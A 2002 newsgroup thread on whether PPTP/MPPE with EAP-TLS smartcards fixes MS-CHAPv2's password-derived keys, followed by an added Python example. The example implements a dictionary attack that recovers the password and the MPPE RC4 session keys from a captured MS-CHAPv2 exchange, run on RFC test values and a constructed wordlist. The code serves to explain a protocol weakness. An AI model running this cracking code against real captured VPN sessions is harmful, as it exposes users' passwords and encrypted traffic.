Re: PPTP/MPPE + Smartcards/EAP-TLS: Security?
From: "S. Pidgorny [MVP]" <slavickp@yahoo.com>
Date: Thu, 28 Nov 2002 20:37:52 +1100
- In reply to: Alex: "PPTP/MPPE + Smartcards/EAP-TLS: Security?"
PPTP with MS-CHAPv2 seems to be all right, and you actually don't need to
open extra ports for CHAP - it's over the PPTP control channel (1723/TCP).
And yes, smartcards are more secure - security is based on possession in
addition to knowledge :)
--
Svyatoslav Pidgorny, MS MVP, MCSE
-= F1 is the key =-

"Alex" <crolyon@hotmail.com> wrote in message news:9cb5d7e3.0211270945.7845e87d@posting.google.com...
> Hello everyone,
>
> I am just wondering if anyone else has tried to analyze this.
> - MPPE even with 128 bit keys in combination with MS-CHAP v1 or v2 has
> some security flaws - the main weakness being the fact that the
> master keys for encryption are generated using the user's password.
> This fact remains, although the generation process is pretty
> complicated. Weak passwords make this system insecure.
> - If combined with EAP-TLS, MPPE's master keys are generated from the
> so-called master secret, which was generated by the EAP server and
> then sent in a secure way (using public-key mechanisms) from the
> EAP server to the client during the mutual authentication with TLS. No
> weak password here.
> (for details, take a look at RFC 3079 :-))
>
> My conclusion:
> TLS is regarded to be secure as far as I know. Thus the main weakness
> of MPPE is solved by not using MS-CHAP but smartcards. This means if I
> already have a PKI and use smartcards for Kerberos authentication with
> W2k/XP I can create a pretty secure VPN with a Windows 2000 RRAS using
> PPTP/MPPE 128 bit and EAP-TLS, right? ... and don't have to worry
> about not being able to use NAT at all (as with IPSec/IKE
> NAT-Traversal when using L2TP/IPSec now).
> A solution with 1 RAS rule that permits PPTP _only_ in combination
> with smartcards and another rule for L2TP/IPSec that also maybe allows
> MS-CHAP v2 seems to be ideal, if you generally want to use the better
> L2TP/IPSec and PPTP just where NAT traversal is needed... at least
> until .NET
>
> Any comments, thoughts, input is greatly appreciated :-)
>
> Alex
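The password dependence Alex describes, as an added example that is not part of the original thread or of either poster's work: it re-implements the pieces of RFC 2759 (MS-CHAPv2) and RFC 3079 (MPPE key derivation) that an eavesdropper needs and runs a dictionary attack on a captured exchange. The username, challenges, NT-Response and password "clientPass" are the worked-example values from RFC 2759 section 9.2; the wordlist is constructed; the server's Success packet is computed locally with the same functions rather than captured (the real server would also check the DES-based NT-Response, which is not recomputed here); the MD4 routine is inline because hashlib often lacks it. Only the 128-bit key case is handled, and the RC4 decryption of the PPP frames with the recovered keys is not shown.

```python
"""Added example: MPPE keys negotiated over MS-CHAPv2 fall with the password.

Not code from the original thread. MD4 and SHA-1 are enough for the
attacker: the Success packet's authenticator response ("S=...") is itself a
password verifier, so no DES-based NT-Response has to be recomputed.
"""
import hashlib
import struct


# ---- MD4 (RFC 1320), implemented inline because hashlib often lacks it ----
def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


_R2_ORDER = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
_R3_ORDER = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def md4(data: bytes) -> bytes:
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for r in range(48):
            if r < 16:    # round 1: F(b,c,d) = (b & c) | (~b & d)
                f, k, s, add = (b & c) | (~b & d), r, (3, 7, 11, 19)[r % 4], 0
            elif r < 32:  # round 2: G = majority, constant 5A827999
                f, k, s, add = (b & c) | (b & d) | (c & d), _R2_ORDER[r - 16], (3, 5, 9, 13)[r % 4], 0x5A827999
            else:         # round 3: H = parity, constant 6ED9EBA1
                f, k, s, add = b ^ c ^ d, _R3_ORDER[r - 32], (3, 9, 11, 15)[r % 4], 0x6ED9EBA1
            a, b, c, d = d, _rotl((a + (f & 0xFFFFFFFF) + x[k] + add) & 0xFFFFFFFF, s), b, c
        h = [(u + v) & 0xFFFFFFFF for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


# ---- MS-CHAPv2 pieces (RFC 2759) ---------------------------------------------
def nt_password_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def challenge_hash(peer_challenge: bytes, authenticator_challenge: bytes, username: str) -> bytes:
    return hashlib.sha1(peer_challenge + authenticator_challenge + username.encode()).digest()[:8]


def authenticator_response(password_hash_hash: bytes, nt_response: bytes, challenge: bytes) -> str:
    """The 'S=...' value the server puts in its Success packet: a password verifier visible on the wire."""
    digest = hashlib.sha1(password_hash_hash + nt_response + b"Magic server to client signing constant").digest()
    return "S=" + hashlib.sha1(digest + challenge + b"Pad to make it do more than one iteration").hexdigest().upper()


# ---- MPPE key derivation from MS-CHAPv2 credentials (RFC 3079) -------------
_MAGIC2 = b"On the client side, this is the send key; on the server side, it is the receive key."
_MAGIC3 = b"On the client side, this is the receive key; on the server side, it is the send key."


def mppe_master_key(password_hash_hash: bytes, nt_response: bytes) -> bytes:
    # Every input here is either derived from the password or sent in clear.
    return hashlib.sha1(password_hash_hash + nt_response + b"This is the MPPE Master Key").digest()[:16]


def mppe_start_key(master_key: bytes, is_send: bool, is_server: bool) -> bytes:
    """128-bit send/receive start key; shorter key lengths (with their fixed leading bytes) are not handled."""
    magic = _MAGIC3 if is_send == is_server else _MAGIC2
    return hashlib.sha1(master_key + b"\x00" * 40 + magic + b"\xf2" * 40).digest()[:16]


# ---- A captured exchange: the RFC 2759 section 9.2 example values ------------
CAPTURED = {
    "username": "User",
    "authenticator_challenge": bytes.fromhex("5B5D7C7D7B3F2F3E3C2C602132262628"),
    "peer_challenge": bytes.fromhex("21402324255E262A28295F2B3A337C7E"),
    "nt_response": bytes.fromhex("82309ECD8D708B5EA08FAA3981CD83544233114A3D85D6DF"),
}


def server_success_packet(password: str, captured: dict) -> str:
    """Stand-in for the server: what its Success packet would carry for this exchange."""
    phh = md4(nt_password_hash(password))
    chal = challenge_hash(captured["peer_challenge"], captured["authenticator_challenge"], captured["username"])
    return authenticator_response(phh, captured["nt_response"], chal)


def crack_mppe_keys(captured: dict, success_packet: str, wordlist):
    """Dictionary attack: returns (password, client_send_key, client_recv_key) or None."""
    chal = challenge_hash(captured["peer_challenge"], captured["authenticator_challenge"], captured["username"])
    for guess in wordlist:
        phh = md4(nt_password_hash(guess))
        if authenticator_response(phh, captured["nt_response"], chal) == success_packet:
            master = mppe_master_key(phh, captured["nt_response"])
            return guess, mppe_start_key(master, True, False), mppe_start_key(master, False, False)
    return None


if __name__ == "__main__":
    packet = server_success_packet("clientPass", CAPTURED)          # simulated, not captured
    wordlist = ["letmein", "Password1", "hunter2", "clientPass"]     # constructed
    found = crack_mppe_keys(CAPTURED, packet, wordlist)
    if found:
        pw, send_key, recv_key = found
        print(f"password {pw!r}  client send key {send_key.hex()}  client recv key {recv_key.hex()}")
```

The attacker ends up with exactly the RC4 keys both ends use, because nothing in the derivation is secret except the password; with EAP-TLS the same MPPE keys come from the TLS master secret instead, so a sniffer of the PPTP session has no guessable input to work from.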